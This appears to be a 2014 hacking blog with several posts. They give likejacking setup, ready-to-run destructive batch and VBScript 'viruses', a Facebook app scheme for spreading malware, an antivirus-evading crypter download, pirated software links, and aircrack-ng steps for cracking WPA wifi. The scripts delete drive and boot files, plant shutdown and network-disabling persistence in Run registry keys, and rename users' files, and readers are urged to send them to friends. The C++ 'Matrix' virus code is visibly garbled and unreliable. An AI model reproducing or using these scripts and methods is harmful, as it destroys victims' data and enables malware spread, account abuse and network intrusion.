Monday, April 28, 2014

Clickjacking


What is Clickjacking ?
https://www.owasp.org/images/thumb/8/84/Clickjacking_description.png/400px-Clickjacking_description.png

Clickjacking is a technique used by hackers or spammers to trick or cheat the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). Clickjacking is possible because of a security weakness in web browsers that allows web pages to be layered and hidden from general view. In this situation what happens is that You think that you are clicking on a standard button or link, like the PLAY button or download button on an video or some stuff, but you are really clicking on a hidden link. Since you can’t see the clickjacker’s hidden link, you have no idea what you’re really doing. You could be downloading malware or making all your Facebook information public without realizing it. Some good hackers make ajax keyloggers and put them as javascripts over their fake websites and when you open them they retrieve all your passwords stored in web browser and records whatever you type while the web browser is open and stores this information on their servers.

There are several types of clickjacking but the most common is to hide a LIKE button under a dummy or fake button. This technique is called Likejacking. A scammer or hacker might trick you by saying that you like a product you’ve never heard. At first glance, likejacking sounds more annoying than harmful, but that’s not always true. If you’re scammed for liking Mark Zukenberg?, the world isn’t likely to end. But you may be helping to spread spam or possibly sending Friends somewhere that contains malware.



How It Work ?
The like button is made hidden and it moves along with the mouse.So, wherever the user clicks, the like button is clicked and your fan page is liked.First download the JavaScript from the below download link.

   


http://adfoc.us/22615842332723
                               



                                                          
After downloading the script extract all the files.Now modify the config.js and follow the below instructions.

1. Modify config.js file in "src" folder to change fan page URL and other things.
Comments are provided beside them to help you what they do exactly.

2. There is a time out function after which the like button will not be present(move) anymore.
"time" if set to 0 will make it stay forever(which is usually not preferred).

3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible



Properly set the var in the file if it is jumbled ?
 After modifying the config.js script upload these scripts to javascript hosting website.I prefer yourjavascript you can also upload to some other website.

How To Run The Script ?
1. Add config.js just above head tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/config.js"> </script>
----------------------------------------------------------------------------------------------------------------

2. Add like.js after body tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/like.js"> </script>
----------------------------------------------------------------------------------------------------------------

Remove src link with your uploaded link.



5. That it, The Script is Ready to go.


Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so. 

You may also like : Create virus using notepad



 

Create your own virus

Create virus using notepad


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUUTHjTfcqqY-VfS2dzwUbvVaAKuK8vqee2wTgR-E__Ec-7QvGX2AvVL9HRY_iGDPjK5wowUG28JjyFifb-nltZIXMdreKWaVUBj4SnWby3Et544ZiQ3NlbCOwLj_v_EV3-jYB_jY2YW0/s1600/computer-virus.jpg

1 -> Virus Creation Tricks 1

Just open the Notepad and type the paste the following Code.

set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having  .vbs Extension .







2 -> Virus Creation Trick  2 .

Open Notepad and write "start" without quotes
Start
Start
Start

and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.


 3 -> Virus Creation Trick 3
Convey your friend a little message and shut down his / her computer:@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.


4 -> Virus Creation Trick 4
Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.
5 -> Virus Creation Trick 5
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :


Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.  

6 -> Virus Creation Trick 6 
This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00



Save The Above Code As Anything.bat




7 -> Virus Creation Trick 7
This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

 8 -> Virus Creation Trick 8
The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y


Save It As Anything.bat


 9 -> Virus Creation Trick 9
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


10 -> Virus Creation Trick 10
Shutdowns Computer Everytime It Is Turned On

Save As A bat File


echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

11 -> Virus Creation Trick 11
Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


Save As A bat File
 
12 -> Virus Creation Trick 12
Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


 
13 -> Virus Creation Trick 13 System Meltdown
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE


Save As A bat File


MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::


Warning - Do not run it on your computer
I'm gonna teach you how to make a virus named Matrix...
1-Open notepad
2-Put in this code


#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;




3-save it as matrix.bat
4-finish



AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN

AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT









Sunday, April 27, 2014

CMD trick


Hack using CMD
  • Click Start--> Run --> CMD


Hack Windows password using cmd

                             


  • Type net user and press enter button.
  •  Select User Account (Example: Guest or administrator)
  • Type net user account user name * (example: net user Hamza *) and press enter
  •  Now Type the new password without knowing old password and confirm it..
  • Now windows password changed or Hacked Successfully.
 
Shutdown enemy's  computer remotely using CMD
  • Type shutdown/i
  • A popup window will appear 


  • click on ADD button and enter the lan ip (Check Lan ip using ipconfig command in CMD)


  • click ok button. 

Check Your IP and Any Website IP Using CMD 

                                 

  • Type ping www.sitename.com (Example ping www.google.com )
  • That all..

Find hidden file using cmd

  • Type dir/ah to see hidden file










Wednesday, April 23, 2014

Remove Write Protection

 Remove Write Protection From USB or Hard drive
 
 



There can be various types of issues related to smartphones. If the user wants to remove write protection, the first step would be to insert the pen drive and then open the Start Menu. Then proceed to the following steps to remove write protection:

  • 1. Open Start Menu

  • 2. Run, type regedit and press Enter; this will open the registry editor

  • 3. Navigate to the following path:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies

  • 4. Double click the key WriteProtect in the right pane and set the value to 0 In the Value Data Box. Press OK

  • 5. Exit Registry

  • 6. Restart your computer and re-connect your USB pen drive on your computer.

Hack Facebook using facebook app


Hack Facebook using facebook app



http://storage.conduit.com/MarketPlace/93/ce3/93951332-f9a7-4af7-af02-17ec3d749ce3/Thumbnail/160x160.png

 Requirements:-

  • You must have a webhost like fileave.com, 110Mb.com, etc.
  •  The file you want to spread must be FUD.
  • If not then download Stealth Crypter (100 % FUD) from GOOGLE

 Follow the Given Steps:-

1. We are now going to setup our Facebook app.

2. You will need a Facebook account to register a Facebook app.

3. For That Go To http://www.facebook.com/developers/createapp.php



 4. Now on Further on right Corner you will see a link named as Setup New Application.


 5. Now fill in the name you want for your application Example I Write "GirlFriend".

 6. Now Click on I agree Terms and then Click on Create Application.


 7. Now Fill the Following Details and then click on Save Changes. 



8. Now click on 'Facebook Integration'.


9. On this page the only thing you need to fill in is the 'Canvas Page'.

10. This allows you to use a Facebook URL for your like button.

11. Fill it in with a name regarding your Facebook page, it can't already be taken For Example I write:  ‘lovegirlfriends’.

12. Then click save changes.



  13. Now Create Your Like Button.
14. Now further going to create a like button to help spread Your App,Go to this link:    http://developers.facebook.com/docs/reference/plugins/like


 15. The only bit you need to fill in is the URL of the page about the canvas so it will be 'http://apps.facebook.com/lovegirlfriends/'


16. Now Further Click on 'Get Code' and copy the IFRAME code to notepad or something so you can use it later.





17. Now Next Step is editing your 'index.html'. We now need to edit our html file so open it in anything that you can edit it with, notepad if you have to.



  18. At this stage you must have your file that you want to spread uploaded to your web host, it cannot be a site such as megaupload it must be a direct link ending in “.exe”.


19. Now upload your Virus/Stealer/Rat in any Webhost

20. The better webhost for server is fileave.com And it will generate the link look like:-'http://apajrlab.fileave.com/apajr.exe'


 21. Now open index.html File and it will look like:- Look for Code:value="ENTER THE URL FOR YOUR VIRUS"

22. Change that to the direct link for your file you want to spread.



 23. Next look for Code:'REPLACE THIS TEXT WITH YOUR FB LIKE BUTTON'  

24. Obviously replace this with the iframe code you just got for your like button.

 25. Upload Your Files on your webhost I follow fileave.com or 110Mb.com
26. This is the easy part; now just upload your three files to your web host.
27. First create a Directory named as Facebook and then upload the three files.




 28. Editing Your App


a. Now we need to edit your app to display the content of the files you just uploaded.

b. Now get us back to allow us to edit the canvas settings.

c. Navigate to the page we were on before and Now we’re going to fill in the canvas URL, Fill it in with the URL where the files are, it must end with a '/'. I recommended uploading your files to a sub directory. E.g. 'http://apajrlab.fileave.com/Facebook/'


 29. Click save settings.


NOTE: - IF FILEAVE.COM displays Error then use this Step
If u have got any Error look like Run time Error or your Canvas URL not Saved then better solution is to upload your Files on other Host like 000webhost.com

  Note: Don't create a Sub-Directory:


It looks like this:
 30. If u have till got Error then goto tinyurl.com or Forward your URL to any Websiteand then write that link on Canvas Url.


31. Now Next Step is testing, To test it, try opening a new browser and visiting your app:'http://apps.facebook.com/lovegirlfriends/'

   You should see something like:






 32. Click run and your file with download and execute.

33. Click the like button for it to show up on your friend’s news feeds and start spreading. (Note: Victims must have java)




Tuesday, April 22, 2014

Download windows 8 transformer for free

Download windows 8 transformer for free













Windows 8 Transformation Pack give you the look and feel of Windows 8 on older
Windows versions. The Metro design, themes, wallpapers, icons, sounds and other features can all be yours with this excellent free theme pack.

Features

Windows 8 Transformation Pack automatically installs several design changes and programs. The freeware comes with an imitation of the new Modern style and adjusts menus, cursors, screensavers and system sounds to emulate Windows' 8th version. You can also configure individual elements of Windows 8 Transformation Pack via the wizard.

Usability

Windows 8 Transformation Pack adds pizazz with its own Modern apps. By clicking on the tile store, you can manage programs and play mini updates or add extra apps. Standard elements include apps like Clock, Calendar, system settings, Gmail, Hotmail, Twitter, Facebook, Internet Explorer, Music and Photo Gallery.

Quality


Windows 8 Transformation Pack is a worthy successor to the popular Seven Transformation Pack. This early version of Windows 8 is a pretty impressive mimic. If Seven Translation Pack is anything to go by, as Windows 8 gets more advanced, so too will Windows 8 Transformation Pack, so keep an eye out for even more updates.


http://adfoc.us/22615842115750


Download microsoft 2013 fullversion for free

Download Microsoft 2013 full version for free





Office 2013 is Microsoft's desktop and cloud productivity suite. It's available as a stand alone desktop package or through Microsoft's Office 365 subscription model. It's various versions include the programs:
  •     Word 2013
  •     Excel 2013
  •     PowerPoint 2013
  •     Outlook 2013
  •     Access 2013
  •     OneNote 2013
  •     Project 2013
  •     Publisher 2013
  •     Visio 2013

The first thing you'll notice when starting Microsoft Office 2013 is it's clean, refreshing and coherent look across all supported platforms including desktop, smartphones and tablets. Through a subscription of Office 365 and the integration with SkyDrive you can access and edit your files from any computer via a browser.
Among the new features are a "Read Mode" in Word 2013 which removes toolbars and lets you swipe and tab through a document like in an "E-Reader". Videos are better supported. They can be searched, added and viewed directly within Word. Excel 2013 has new easy ways of working with formulas and charts in spreadsheets. Powerpoint 2013 was enhanced with better controls while in presentation mode, for example "Slide Zoom" to zoom in on a section of your slide. Adding photos to a presentation also became easier as you can now search and add pictures from your albums on Flickr and other online photo and social network sites.


http://www.mediafire.com/view/tdcbidro9ijttjd/M.Office_Professional_Plus_2013_FULL_VERSION_Latest


Sunday, April 20, 2014

Download Aegis crypter fullversion for free

Download Aegis crypter full version for free












 Aegis Crypter can be used to encrypt viruses,RAT,keyloggers,spywares etc to make them undetectable from antiviruses.When these exe files are encrypted with Fud crypters they become undetectable with antiviruses.This tool is best for hacking, using this we can encrypt any file which cannot be recoganised by any antivirus.
Download and enjoy


http://adfoc.us/22615842014909

Friday, April 18, 2014

Hack wifi using backtrack (O.S)


Hack wifi using backtrack (O.S)

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjehAu9NPf5QuhCLMfjSYVnvQLy9BgeCa4-8FraLjWJuxqEIR_0dZRGP-k7Rrj2Cm_KMT32fyM6tEfID_nCHRpJLuh8n-F8dky49Z2u-ZQhw58tgr5TYF55quujov6RXjHH2FziAt-rMQs0/s1600/Backtrack.png


Step1 : Open a new terminal and type if config     
 
Step 2 : Now we are going to down the server and pass our mac addresses.  To do so enter 
ifconfig wlan0 down.
 
Step 3 : Now pass the mac addresses by using the command -m 00:11:22:33:44:55 wlan0
   
     
Step 4 : Now we are going to start hacking the wifi.  Remember wep is less secured than wpa. Now enter  airmon-ng start wlan0       

                                                                        
Step 5 : Now we can see that monitor mode is enabled. Now to scan for wireless network enter  the command airodump-ng mon0
Step 6: When you enter this command a screen will scan all the wirelesses network . When you find your wifi which you want to hack press ctrl+c to stop scan.  Now copy the bssid of the required wifi.





Step 7 : Now we are going to pass the data to do so enter the command remember you must give your bssid and channel airdump-ng  --bssid 00:23:69:98:AC:05 -c 4 hackwpa mon0


Step 8: Now a page will appear which will send and receive data .  Wait till the limited data is send and recivied .


Step 9:  Dont close the above terminal. Now open a new terminal and enter the command which is to get replay  aireplay-ng  -0 30 -a 00:23:69:98:AC:05 mon0



Step 10 : Now open that terminal which was sending and reciving data . wpa handshake  will be created.


Step 11:  Now open a new terminal and here iam using wordlist if dont have wordlist you can use brutforce and rainbow attack also.Heare Iam using dictionary attack, enter the command to hack
aircrack-ng -w wordlist -b 00:23:69:98:AC:05 hackwpa*.cap

Step 12 : Now you have hacked wifi.